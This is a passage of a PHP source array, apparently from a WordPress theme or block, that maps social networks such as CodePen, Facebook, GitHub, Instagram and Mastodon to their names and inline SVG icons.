			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M15.6,7.2H14v1.5h1.6c2,0,3.7,1.7,3.7,3.7s-1.7,3.7-3.7,3.7H14v1.5h1.6c2.8,0,5.2-2.3,5.2-5.2,0-2.9-2.3-5.2-5.2-5.2zM4.7,12.4c0-2,1.7-3.7,3.7-3.7H10V7.2H8.4c-2.9,0-5.2,2.3-5.2,5.2,0,2.9,2.3,5.2,5.2,5.2H10v-1.5H8.4c-2,0-3.7-1.7-3.7-3.7zm4.6.9h5.3v-1.5H9.3v1.5z"></path></svg>',
		),
		'codepen'       => array(
			'name' => 'CodePen',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M22.016,8.84c-0.002-0.013-0.005-0.025-0.007-0.037c-0.005-0.025-0.008-0.048-0.015-0.072 c-0.003-0.015-0.01-0.028-0.013-0.042c-0.008-0.02-0.015-0.04-0.023-0.062c-0.007-0.015-0.013-0.028-0.02-0.042 c-0.008-0.02-0.018-0.037-0.03-0.057c-0.007-0.013-0.017-0.027-0.025-0.038c-0.012-0.018-0.023-0.035-0.035-0.052 c-0.01-0.013-0.02-0.025-0.03-0.037c-0.015-0.017-0.028-0.032-0.043-0.045c-0.01-0.012-0.022-0.023-0.035-0.035 c-0.015-0.015-0.032-0.028-0.048-0.04c-0.012-0.01-0.025-0.02-0.037-0.03c-0.005-0.003-0.01-0.008-0.015-0.012l-9.161-6.096 c-0.289-0.192-0.666-0.192-0.955,0L2.359,8.237C2.354,8.24,2.349,8.245,2.344,8.249L2.306,8.277 c-0.017,0.013-0.033,0.027-0.048,0.04C2.246,8.331,2.234,8.342,2.222,8.352c-0.015,0.015-0.028,0.03-0.042,0.047 c-0.012,0.013-0.022,0.023-0.03,0.037C2.139,8.453,2.125,8.471,2.115,8.488C2.107,8.501,2.099,8.514,2.09,8.526 C2.079,8.548,2.069,8.565,2.06,8.585C2.054,8.6,2.047,8.613,2.04,8.626C2.032,8.648,2.025,8.67,2.019,8.69 c-0.005,0.013-0.01,0.027-0.013,0.042C1.999,8.755,1.995,8.778,1.99,8.803C1.989,8.817,1.985,8.828,1.984,8.84 C1.978,8.879,1.975,8.915,1.975,8.954v6.093c0,0.037,0.003,0.075,0.008,0.112c0.002,0.012,0.005,0.025,0.007,0.038 c0.005,0.023,0.008,0.047,0.015,0.072c0.003,0.015,0.008,0.028,0.013,0.04c0.007,0.022,0.013,0.042,0.022,0.063 c0.007,0.015,0.013,0.028,0.02,0.04c0.008,0.02,0.018,0.038,0.03,0.058c0.007,0.013,0.015,0.027,0.025,0.038 c0.012,0.018,0.023,0.035,0.035,0.052c0.01,0.013,0.02,0.025,0.03,0.037c0.013,0.015,0.028,0.032,0.042,0.045 c0.012,0.012,0.023,0.023,0.035,0.035c0.015,0.013,0.032,0.028,0.048,0.04l0.038,0.03c0.005,0.003,0.01,0.007,0.013,0.01 l9.163,6.095C11.668,21.953,11.833,22,12,22c0.167,0,0.332-0.047,0.478-0.144l9.163-6.095l0.015-0.01 c0.013-0.01,0.027-0.02,0.037-0.03c0.018-0.013,0.035-0.028,0.048-0.04c0.013-0.012,0.025-0.023,0.035-0.035 c0.017-0.015,0.03-0.032,0.043-0.045c0.01-0.013,0.02-0.025,0.03-0.037c0.013-0.018,0.025-0.035,0.035-0.052 c0.008-0.013,0.018-0.027,0.025-0.038c0.012-0.02,0.022-0.038,0.03-0.058c0.007-0.013,0.013-0.027,0.02-0.04 c0.008-0.022,0.015-0.042,0.023-0.063c0.003-0.013,0.01-0.027,0.013-0.04c0.007-0.025,0.01-0.048,0.015-0.072 c0.002-0.013,0.005-0.027,0.007-0.037c0.003-0.042,0.007-0.079,0.007-0.117V8.954C22.025,8.915,22.022,8.879,22.016,8.84z M12.862,4.464l6.751,4.49l-3.016,2.013l-3.735-2.492V4.464z M11.138,4.464v4.009l-3.735,2.494L4.389,8.954L11.138,4.464z M3.699,10.562L5.853,12l-2.155,1.438V10.562z M11.138,19.536l-6.749-4.491l3.015-2.011l3.735,2.492V19.536z M12,14.035L8.953,12 L12,9.966L15.047,12L12,14.035z M12.862,19.536v-4.009l3.735-2.492l3.016,2.011L12.862,19.536z M20.303,13.438L18.147,12 l2.156-1.438L20.303,13.438z"></path></svg>',
		),
		'deviantart'    => array(
			'name' => 'DeviantArt',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M 18.19 5.636 18.19 2 18.188 2 14.553 2 14.19 2.366 12.474 5.636 11.935 6 5.81 6 5.81 10.994 9.177 10.994 9.477 11.357 5.81 18.363 5.81 22 5.811 22 9.447 22 9.81 21.634 11.526 18.364 12.065 18 18.19 18 18.19 13.006 14.823 13.006 14.523 12.641 18.19 5.636z"></path></svg>',
		),
		'dribbble'      => array(
			'name' => 'Dribbble',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M12,22C6.486,22,2,17.514,2,12S6.486,2,12,2c5.514,0,10,4.486,10,10S17.514,22,12,22z M20.434,13.369 c-0.292-0.092-2.644-0.794-5.32-0.365c1.117,3.07,1.572,5.57,1.659,6.09C18.689,17.798,20.053,15.745,20.434,13.369z M15.336,19.876c-0.127-0.749-0.623-3.361-1.822-6.477c-0.019,0.006-0.038,0.013-0.056,0.019c-4.818,1.679-6.547,5.02-6.701,5.334 c1.448,1.129,3.268,1.803,5.243,1.803C13.183,20.555,14.311,20.313,15.336,19.876z M5.654,17.724 c0.193-0.331,2.538-4.213,6.943-5.637c0.111-0.036,0.224-0.07,0.337-0.102c-0.214-0.485-0.448-0.971-0.692-1.45 c-4.266,1.277-8.405,1.223-8.778,1.216c-0.003,0.087-0.004,0.174-0.004,0.261C3.458,14.207,4.29,16.21,5.654,17.724z M3.639,10.264 c0.382,0.005,3.901,0.02,7.897-1.041c-1.415-2.516-2.942-4.631-3.167-4.94C5.979,5.41,4.193,7.613,3.639,10.264z M9.998,3.709 c0.236,0.316,1.787,2.429,3.187,5c3.037-1.138,4.323-2.867,4.477-3.085C16.154,4.286,14.17,3.471,12,3.471 C11.311,3.471,10.641,3.554,9.998,3.709z M18.612,6.612C18.432,6.855,17,8.69,13.842,9.979c0.199,0.407,0.389,0.821,0.567,1.237 c0.063,0.148,0.124,0.295,0.184,0.441c2.842-0.357,5.666,0.215,5.948,0.275C20.522,9.916,19.801,8.065,18.612,6.612z"></path></svg>',
		),
		'dropbox'       => array(
			'name' => 'Dropbox',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M12,6.134L6.069,9.797L2,6.54l5.883-3.843L12,6.134z M2,13.054l5.883,3.843L12,13.459L6.069,9.797L2,13.054z M12,13.459 l4.116,3.439L22,13.054l-4.069-3.257L12,13.459z M22,6.54l-5.884-3.843L12,6.134l5.931,3.663L22,6.54z M12.011,14.2l-4.129,3.426 l-1.767-1.153v1.291l5.896,3.539l5.897-3.539v-1.291l-1.769,1.153L12.011,14.2z"></path></svg>',
		),
		'etsy'          => array(
			'name' => 'Etsy',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M9.16033,4.038c0-.27174.02717-.43478.48913-.43478h6.22283c1.087,0,1.68478.92391,2.11957,2.663l.35326,1.38587h1.05978C19.59511,3.712,19.75815,2,19.75815,2s-2.663.29891-4.23913.29891h-7.962L3.29076,2.163v1.1413L4.731,3.57609c1.00543.19022,1.25.40761,1.33152,1.33152,0,0,.08152,2.71739.08152,7.20109s-.08152,7.17391-.08152,7.17391c0,.81522-.32609,1.11413-1.33152,1.30435l-1.44022.27174V22l4.2663-.13587h7.11957c1.60326,0,5.32609.13587,5.32609.13587.08152-.97826.625-5.40761.70652-5.89674H19.7038L18.644,18.52174c-.84239,1.90217-2.06522,2.038-3.42391,2.038H11.1712c-1.3587,0-2.01087-.54348-2.01087-1.712V12.65217s3.0163,0,3.99457.08152c.76087.05435,1.22283.27174,1.46739,1.33152l.32609,1.413h1.16848l-.08152-3.55978.163-3.587H15.02989l-.38043,1.57609c-.24457,1.03261-.40761,1.22283-1.46739,1.33152-1.38587.13587-4.02174.1087-4.02174.1087Z"></path></svg>',
		),
		'facebook'      => array(
			'name' => 'Facebook',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M12 2C6.5 2 2 6.5 2 12c0 5 3.7 9.1 8.4 9.9v-7H7.9V12h2.5V9.8c0-2.5 1.5-3.9 3.8-3.9 1.1 0 2.2.2 2.2.2v2.5h-1.3c-1.2 0-1.6.8-1.6 1.6V12h2.8l-.4 2.9h-2.3v7C18.3 21.1 22 17 22 12c0-5.5-4.5-10-10-10z"></path></svg>',
		),
		'feed'          => array(
			'name' => 'RSS Feed',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M2,8.667V12c5.515,0,10,4.485,10,10h3.333C15.333,14.637,9.363,8.667,2,8.667z M2,2v3.333 c9.19,0,16.667,7.477,16.667,16.667H22C22,10.955,13.045,2,2,2z M4.5,17C3.118,17,2,18.12,2,19.5S3.118,22,4.5,22S7,20.88,7,19.5 S5.882,17,4.5,17z"></path></svg>',
		),
		'flickr'        => array(
			'name' => 'Flickr',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M6.5,7c-2.75,0-5,2.25-5,5s2.25,5,5,5s5-2.25,5-5S9.25,7,6.5,7z M17.5,7c-2.75,0-5,2.25-5,5s2.25,5,5,5s5-2.25,5-5 S20.25,7,17.5,7z"></path></svg>',
		),
		'foursquare'    => array(
			'name' => 'Foursquare',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M17.573,2c0,0-9.197,0-10.668,0S5,3.107,5,3.805s0,16.948,0,16.948c0,0.785,0.422,1.077,0.66,1.172 c0.238,0.097,0.892,0.177,1.285-0.275c0,0,5.035-5.843,5.122-5.93c0.132-0.132,0.132-0.132,0.262-0.132h3.26 c1.368,0,1.588-0.977,1.732-1.552c0.078-0.318,0.692-3.428,1.225-6.122l0.675-3.368C19.56,2.893,19.14,2,17.573,2z M16.495,7.22 c-0.053,0.252-0.372,0.518-0.665,0.518c-0.293,0-4.157,0-4.157,0c-0.467,0-0.802,0.318-0.802,0.787v0.508 c0,0.467,0.337,0.798,0.805,0.798c0,0,3.197,0,3.528,0s0.655,0.362,0.583,0.715c-0.072,0.353-0.407,2.102-0.448,2.295 c-0.04,0.193-0.262,0.523-0.655,0.523c-0.33,0-2.88,0-2.88,0c-0.523,0-0.683,0.068-1.033,0.503 c-0.35,0.437-3.505,4.223-3.505,4.223c-0.032,0.035-0.063,0.027-0.063-0.015V4.852c0-0.298,0.26-0.648,0.648-0.648 c0,0,8.228,0,8.562,0c0.315,0,0.61,0.297,0.528,0.683L16.495,7.22z"></path></svg>',
		),
		'goodreads'     => array(
			'name' => 'Goodreads',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M17.3,17.5c-0.2,0.8-0.5,1.4-1,1.9c-0.4,0.5-1,0.9-1.7,1.2C13.9,20.9,13.1,21,12,21c-0.6,0-1.3-0.1-1.9-0.2 c-0.6-0.1-1.1-0.4-1.6-0.7c-0.5-0.3-0.9-0.7-1.2-1.2c-0.3-0.5-0.5-1.1-0.5-1.7h1.5c0.1,0.5,0.2,0.9,0.5,1.2 c0.2,0.3,0.5,0.6,0.9,0.8c0.3,0.2,0.7,0.3,1.1,0.4c0.4,0.1,0.8,0.1,1.2,0.1c1.4,0,2.5-0.4,3.1-1.2c0.6-0.8,1-2,1-3.5v-1.7h0 c-0.4,0.8-0.9,1.4-1.6,1.9c-0.7,0.5-1.5,0.7-2.4,0.7c-1,0-1.9-0.2-2.6-0.5C8.7,15,8.1,14.5,7.7,14c-0.5-0.6-0.8-1.3-1-2.1 c-0.2-0.8-0.3-1.6-0.3-2.5c0-0.9,0.1-1.7,0.4-2.5c0.3-0.8,0.6-1.5,1.1-2c0.5-0.6,1.1-1,1.8-1.4C10.3,3.2,11.1,3,12,3 c0.5,0,0.9,0.1,1.3,0.2c0.4,0.1,0.8,0.3,1.1,0.5c0.3,0.2,0.6,0.5,0.9,0.8c0.3,0.3,0.5,0.6,0.6,1h0V3.4h1.5V15 C17.6,15.9,17.5,16.7,17.3,17.5z M13.8,14.1c0.5-0.3,0.9-0.7,1.3-1.1c0.3-0.5,0.6-1,0.8-1.6c0.2-0.6,0.3-1.2,0.3-1.9 c0-0.6-0.1-1.2-0.2-1.9c-0.1-0.6-0.4-1.2-0.7-1.7c-0.3-0.5-0.7-0.9-1.3-1.2c-0.5-0.3-1.1-0.5-1.9-0.5s-1.4,0.2-1.9,0.5 c-0.5,0.3-1,0.7-1.3,1.2C8.5,6.4,8.3,7,8.1,7.6C8,8.2,7.9,8.9,7.9,9.5c0,0.6,0.1,1.3,0.2,1.9C8.3,12,8.6,12.5,8.9,13 c0.3,0.5,0.8,0.8,1.3,1.1c0.5,0.3,1.1,0.4,1.9,0.4C12.7,14.5,13.3,14.4,13.8,14.1z"></path></svg>',
		),
		'google'        => array(
			'name' => 'Google',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M12.02,10.18v3.72v0.01h5.51c-0.26,1.57-1.67,4.22-5.5,4.22c-3.31,0-6.01-2.75-6.01-6.12s2.7-6.12,6.01-6.12 c1.87,0,3.13,0.8,3.85,1.48l2.84-2.76C16.99,2.99,14.73,2,12.03,2c-5.52,0-10,4.48-10,10s4.48,10,10,10c5.77,0,9.6-4.06,9.6-9.77 c0-0.83-0.11-1.42-0.25-2.05H12.02z"></path></svg>',
		),
		'github'        => array(
			'name' => 'GitHub',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M12,2C6.477,2,2,6.477,2,12c0,4.419,2.865,8.166,6.839,9.489c0.5,0.09,0.682-0.218,0.682-0.484 c0-0.236-0.009-0.866-0.014-1.699c-2.782,0.602-3.369-1.34-3.369-1.34c-0.455-1.157-1.11-1.465-1.11-1.465 c-0.909-0.62,0.069-0.608,0.069-0.608c1.004,0.071,1.532,1.03,1.532,1.03c0.891,1.529,2.341,1.089,2.91,0.833 c0.091-0.647,0.349-1.086,0.635-1.337c-2.22-0.251-4.555-1.111-4.555-4.943c0-1.091,0.39-1.984,1.03-2.682 C6.546,8.54,6.202,7.524,6.746,6.148c0,0,0.84-0.269,2.75,1.025C10.295,6.95,11.15,6.84,12,6.836 c0.85,0.004,1.705,0.114,2.504,0.336c1.909-1.294,2.748-1.025,2.748-1.025c0.546,1.376,0.202,2.394,0.1,2.646 c0.64,0.699,1.026,1.591,1.026,2.682c0,3.841-2.337,4.687-4.565,4.935c0.359,0.307,0.679,0.917,0.679,1.852 c0,1.335-0.012,2.415-0.012,2.741c0,0.269,0.18,0.579,0.688,0.481C19.138,20.161,22,16.416,22,12C22,6.477,17.523,2,12,2z"></path></svg>',
		),
		'gravatar'      => array(
			'name' => 'Gravatar',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M10.8001 4.69937V10.6494C10.8001 11.1001 10.9791 11.5323 11.2978 11.851C11.6165 12.1697 12.0487 12.3487 12.4994 12.3487C12.9501 12.3487 13.3824 12.1697 13.7011 11.851C14.0198 11.5323 14.1988 11.1001 14.1988 10.6494V6.69089C15.2418 7.05861 16.1371 7.75537 16.7496 8.67617C17.3622 9.59698 17.6589 10.6919 17.595 11.796C17.5311 12.9001 17.1101 13.9535 16.3954 14.7975C15.6807 15.6415 14.711 16.2303 13.6325 16.4753C12.5541 16.7202 11.4252 16.608 10.4161 16.1555C9.40691 15.703 8.57217 14.9348 8.03763 13.9667C7.50308 12.9985 7.29769 11.8828 7.45242 10.7877C7.60714 9.69266 8.11359 8.67755 8.89545 7.89537C9.20904 7.57521 9.38364 7.14426 9.38132 6.69611C9.37899 6.24797 9.19994 5.81884 8.88305 5.50195C8.56616 5.18506 8.13704 5.00601 7.68889 5.00369C7.24075 5.00137 6.80979 5.17597 6.48964 5.48956C5.09907 6.8801 4.23369 8.7098 4.04094 10.6669C3.84819 12.624 4.34 14.5873 5.43257 16.2224C6.52515 17.8575 8.15088 19.0632 10.0328 19.634C11.9146 20.2049 13.9362 20.1055 15.753 19.3529C17.5699 18.6003 19.0695 17.241 19.9965 15.5066C20.9234 13.7722 21.2203 11.7701 20.8366 9.84133C20.4528 7.91259 19.4122 6.17658 17.892 4.92911C16.3717 3.68163 14.466 2.99987 12.4994 3C12.0487 3 11.6165 3.17904 11.2978 3.49773C10.9791 3.81643 10.8001 4.24867 10.8001 4.69937Z" /></svg>',
		),
		'instagram'     => array(
			'name' => 'Instagram',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M12,4.622c2.403,0,2.688,0.009,3.637,0.052c0.877,0.04,1.354,0.187,1.671,0.31c0.42,0.163,0.72,0.358,1.035,0.673 c0.315,0.315,0.51,0.615,0.673,1.035c0.123,0.317,0.27,0.794,0.31,1.671c0.043,0.949,0.052,1.234,0.052,3.637 s-0.009,2.688-0.052,3.637c-0.04,0.877-0.187,1.354-0.31,1.671c-0.163,0.42-0.358,0.72-0.673,1.035 c-0.315,0.315-0.615,0.51-1.035,0.673c-0.317,0.123-0.794,0.27-1.671,0.31c-0.949,0.043-1.233,0.052-3.637,0.052 s-2.688-0.009-3.637-0.052c-0.877-0.04-1.354-0.187-1.671-0.31c-0.42-0.163-0.72-0.358-1.035-0.673 c-0.315-0.315-0.51-0.615-0.673-1.035c-0.123-0.317-0.27-0.794-0.31-1.671C4.631,14.688,4.622,14.403,4.622,12 s0.009-2.688,0.052-3.637c0.04-0.877,0.187-1.354,0.31-1.671c0.163-0.42,0.358-0.72,0.673-1.035 c0.315-0.315,0.615-0.51,1.035-0.673c0.317-0.123,0.794-0.27,1.671-0.31C9.312,4.631,9.597,4.622,12,4.622 M12,3 C9.556,3,9.249,3.01,8.289,3.054C7.331,3.098,6.677,3.25,6.105,3.472C5.513,3.702,5.011,4.01,4.511,4.511 c-0.5,0.5-0.808,1.002-1.038,1.594C3.25,6.677,3.098,7.331,3.054,8.289C3.01,9.249,3,9.556,3,12c0,2.444,0.01,2.751,0.054,3.711 c0.044,0.958,0.196,1.612,0.418,2.185c0.23,0.592,0.538,1.094,1.038,1.594c0.5,0.5,1.002,0.808,1.594,1.038 c0.572,0.222,1.227,0.375,2.185,0.418C9.249,20.99,9.556,21,12,21s2.751-0.01,3.711-0.054c0.958-0.044,1.612-0.196,2.185-0.418 c0.592-0.23,1.094-0.538,1.594-1.038c0.5-0.5,0.808-1.002,1.038-1.594c0.222-0.572,0.375-1.227,0.418-2.185 C20.99,14.751,21,14.444,21,12s-0.01-2.751-0.054-3.711c-0.044-0.958-0.196-1.612-0.418-2.185c-0.23-0.592-0.538-1.094-1.038-1.594 c-0.5-0.5-1.002-0.808-1.594-1.038c-0.572-0.222-1.227-0.375-2.185-0.418C14.751,3.01,14.444,3,12,3L12,3z M12,7.378 c-2.552,0-4.622,2.069-4.622,4.622S9.448,16.622,12,16.622s4.622-2.069,4.622-4.622S14.552,7.378,12,7.378z M12,15 c-1.657,0-3-1.343-3-3s1.343-3,3-3s3,1.343,3,3S13.657,15,12,15z M16.804,6.116c-0.596,0-1.08,0.484-1.08,1.08 s0.484,1.08,1.08,1.08c0.596,0,1.08-0.484,1.08-1.08S17.401,6.116,16.804,6.116z"></path></svg>',
		),
		'lastfm'        => array(
			'name' => 'Last.fm',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M10.5002,0 C4.7006,0 0,4.70109753 0,10.4998496 C0,16.2989526 4.7006,21 10.5002,21 C16.299,21 21,16.2989526 21,10.4998496 C21,4.70109753 16.299,0 10.5002,0 Z M14.69735,14.7204413 C13.3164,14.7151781 12.4346,14.0870017 11.83445,12.6859357 L11.6816001,12.3451305 L10.35405,9.31011397 C9.92709997,8.26875064 8.85260001,7.57120012 7.68010001,7.57120012 C6.06945001,7.57120012 4.75925001,8.88509738 4.75925001,10.5009524 C4.75925001,12.1164565 6.06945001,13.4303036 7.68010001,13.4303036 C8.77200001,13.4303036 9.76514999,12.827541 10.2719501,11.8567047 C10.2893,11.8235214 10.3239,11.8019673 10.36305,11.8038219 C10.4007,11.8053759 10.43535,11.8287847 10.4504,11.8631709 L10.98655,13.1045863 C11.0016,13.1389726 10.9956,13.17782 10.97225,13.2068931 C10.1605001,14.1995341 8.96020001,14.7683115 7.68010001,14.7683115 C5.33305,14.7683115 3.42340001,12.8535563 3.42340001,10.5009524 C3.42340001,8.14679459 5.33300001,6.23203946 7.68010001,6.23203946 C9.45720002,6.23203946 10.8909,7.19074535 11.6138,8.86359341 C11.6205501,8.88018505 12.3412,10.5707777 12.97445,12.0190621 C13.34865,12.8739575 13.64615,13.3959676 14.6288,13.4291508 C15.5663001,13.4612814 16.25375,12.9121534 16.25375,12.1484869 C16.25375,11.4691321 15.8320501,11.3003585 14.8803,10.98216 C13.2365,10.4397989 12.34495,9.88605929 12.34495,8.51817658 C12.34495,7.1809207 13.26665,6.31615054 14.692,6.31615054 C15.62875,6.31615054 16.3155,6.7286858 16.79215,7.5768142 C16.80495,7.60062396 16.8079001,7.62814302 16.8004001,7.65420843 C16.7929,7.68027384 16.7748,7.70212868 16.7507001,7.713808 L15.86145,8.16900031 C15.8178001,8.19200805 15.7643,8.17807308 15.73565,8.13847371 C15.43295,7.71345711 15.0956,7.52513451 14.6423,7.52513451 C14.05125,7.52513451 13.6220001,7.92899802 13.6220001,8.48649708 C13.6220001,9.17382194 14.1529001,9.34144259 15.0339,9.61923972 C15.14915,9.65578139 15.26955,9.69397731 15.39385,9.73432853 C16.7763,10.1865133 17.57675,10.7311301 17.57675,12.1836251 C17.57685,13.629654 16.3389,14.7204413 14.69735,14.7204413 Z"></path></svg>',
		),
		'linkedin'      => array(
			'name' => 'LinkedIn',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M19.7,3H4.3C3.582,3,3,3.582,3,4.3v15.4C3,20.418,3.582,21,4.3,21h15.4c0.718,0,1.3-0.582,1.3-1.3V4.3 C21,3.582,20.418,3,19.7,3z M8.339,18.338H5.667v-8.59h2.672V18.338z M7.004,8.574c-0.857,0-1.549-0.694-1.549-1.548 c0-0.855,0.691-1.548,1.549-1.548c0.854,0,1.547,0.694,1.547,1.548C8.551,7.881,7.858,8.574,7.004,8.574z M18.339,18.338h-2.669 v-4.177c0-0.996-0.017-2.278-1.387-2.278c-1.389,0-1.601,1.086-1.601,2.206v4.249h-2.667v-8.59h2.559v1.174h0.037 c0.356-0.675,1.227-1.387,2.526-1.387c2.703,0,3.203,1.779,3.203,4.092V18.338z"></path></svg>',
		),
		'mail'          => array(
			'name' => 'Mail',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M19,5H5c-1.1,0-2,.9-2,2v10c0,1.1.9,2,2,2h14c1.1,0,2-.9,2-2V7c0-1.1-.9-2-2-2zm.5,12c0,.3-.2.5-.5.5H5c-.3,0-.5-.2-.5-.5V9.8l7.5,5.6,7.5-5.6V17zm0-9.1L12,13.6,4.5,7.9V7c0-.3.2-.5.5-.5h14c.3,0,.5.2.5.5v.9z"></path></svg>',
		),
		'mastodon'      => array(
			'name' => 'Mastodon',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M23.193 7.879c0-5.206-3.411-6.732-3.411-6.732C18.062.357 15.108.025 12.041 0h-.076c-3.068.025-6.02.357-7.74 1.147 0 0-3.411 1.526-3.411 6.732 0 1.192-.023 2.618.015 4.129.124 5.092.934 10.109 5.641 11.355 2.17.574 4.034.695 5.535.612 2.722-.15 4.25-.972 4.25-.972l-.09-1.975s-1.945.613-4.129.539c-2.165-.074-4.449-.233-4.799-2.891a5.499 5.499 0 0 1-.048-.745s2.125.52 4.817.643c1.646.075 3.19-.097 4.758-.283 3.007-.359 5.625-2.212 5.954-3.905.517-2.665.475-6.507.475-6.507zm-4.024 6.709h-2.497V8.469c0-1.29-.543-1.944-1.628-1.944-1.2 0-1.802.776-1.802 2.312v3.349h-2.483v-3.35c0-1.536-.602-2.312-1.802-2.312-1.085 0-1.628.655-1.628 1.944v6.119H4.832V8.284c0-1.289.328-2.313.987-3.07.68-.758 1.569-1.146 2.674-1.146 1.278 0 2.246.491 2.886 1.474L12 6.585l.622-1.043c.64-.983 1.608-1.474 2.886-1.474 1.104 0 1.994.388 2.674 1.146.658.757.986 1.781.986 3.07v6.304z"/></svg>',
		),
		'meetup'        => array(
			'name' => 'Meetup',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M19.24775,14.722a3.57032,3.57032,0,0,1-2.94457,3.52073,3.61886,3.61886,0,0,1-.64652.05634c-.07314-.0008-.10187.02846-.12507.09547A2.38881,2.38881,0,0,1,13.49453,20.094a2.33092,2.33092,0,0,1-1.827-.50716.13635.13635,0,0,0-.19878-.00408,3.191,3.191,0,0,1-2.104.60248,3.26309,3.26309,0,0,1-3.00324-2.71993,2.19076,2.19076,0,0,1-.03512-.30865c-.00156-.08579-.03413-.1189-.11608-.13493a2.86421,2.86421,0,0,1-1.23189-.56111,2.945,2.945,0,0,1-1.166-2.05749,2.97484,2.97484,0,0,1,.87524-2.50774.112.112,0,0,0,.02091-.16107,2.7213,2.7213,0,0,1-.36648-1.48A2.81256,2.81256,0,0,1,6.57673,7.58838a.35764.35764,0,0,0,.28869-.22819,4.2208,4.2208,0,0,1,6.02892-1.90111.25161.25161,0,0,0,.22023.0243,3.65608,3.65608,0,0,1,3.76031.90678A3.57244,3.57244,0,0,1,17.95918,8.626a2.97339,2.97339,0,0,1,.01829.57356.10637.10637,0,0,0,.0853.12792,1.97669,1.97669,0,0,1,1.27939,1.33733,2.00266,2.00266,0,0,1-.57112,2.12652c-.05284.05166-.04168.08328-.01173.13489A3.51189,3.51189,0,0,1,19.24775,14.722Zm-6.35959-.27836a1.6984,1.6984,0,0,0,1.14556,1.61113,3.82039,3.82039,0,0,0,1.036.17935,1.46888,1.46888,0,0,0,.73509-.12255.44082.44082,0,0,0,.26057-.44274.45312.45312,0,0,0-.29211-.43375.97191.97191,0,0,0-.20678-.063c-.21326-.03806-.42754-.0701-.63973-.11215a.54787.54787,0,0,1-.50172-.60926,2.75864,2.75864,0,0,1,.1773-.901c.1763-.535.414-1.045.64183-1.55913A12.686,12.686,0,0,0,15.85,10.47863a1.58461,1.58461,0,0,0,.04861-.87208,1.04531,1.04531,0,0,0-.85432-.83981,1.60658,1.60658,0,0,0-1.23654.16594.27593.27593,0,0,1-.36286-.03413c-.085-.0747-.16594-.15379-.24918-.23055a.98682.98682,0,0,0-1.33577-.04933,6.1468,6.1468,0,0,1-.4989.41615.47762.47762,0,0,1-.51535.03566c-.17448-.09307-.35512-.175-.53531-.25665a1.74949,1.74949,0,0,0-.56476-.2016,1.69943,1.69943,0,0,0-1.61654.91787,8.05815,8.05815,0,0,0-.32952.80126c-.45471,1.2557-.82507,2.53825-1.20838,3.81639a1.24151,1.24151,0,0,0,.51532,1.44389,1.42659,1.42659,0,0,0,1.22008.17166,1.09728,1.09728,0,0,0,.66994-.69764c.44145-1.04111.839-2.09989,1.25981-3.14926.11581-.28876.22792-.57874.35078-.86438a.44548.44548,0,0,1,.69189-.19539.50521.50521,0,0,1,.15044.43836,1.75625,1.75625,0,0,1-.14731.50453c-.27379.69219-.55265,1.38236-.82766,2.074a2.0836,2.0836,0,0,0-.14038.42876.50719.50719,0,0,0,.27082.57722.87236.87236,0,0,0,.66145.02739.99137.99137,0,0,0,.53406-.532q.61571-1.20914,1.228-2.42031.28423-.55863.57585-1.1133a.87189.87189,0,0,1,.29055-.35253.34987.34987,0,0,1,.37634-.01265.30291.30291,0,0,1,.12434.31459.56716.56716,0,0,1-.04655.1915c-.05318.12739-.10286.25669-.16183.38156-.34118.71775-.68754,1.43273-1.02568,2.152A2.00213,2.00213,0,0,0,12.88816,14.44366Zm4.78568,5.28972a.88573.88573,0,0,0-1.77139.00465.8857.8857,0,0,0,1.77139-.00465Zm-14.83838-7.296a.84329.84329,0,1,0,.00827-1.68655.8433.8433,0,0,0-.00827,1.68655Zm10.366-9.43673a.83506.83506,0,1,0-.0091,1.67.83505.83505,0,0,0,.0091-1.67Zm6.85014,5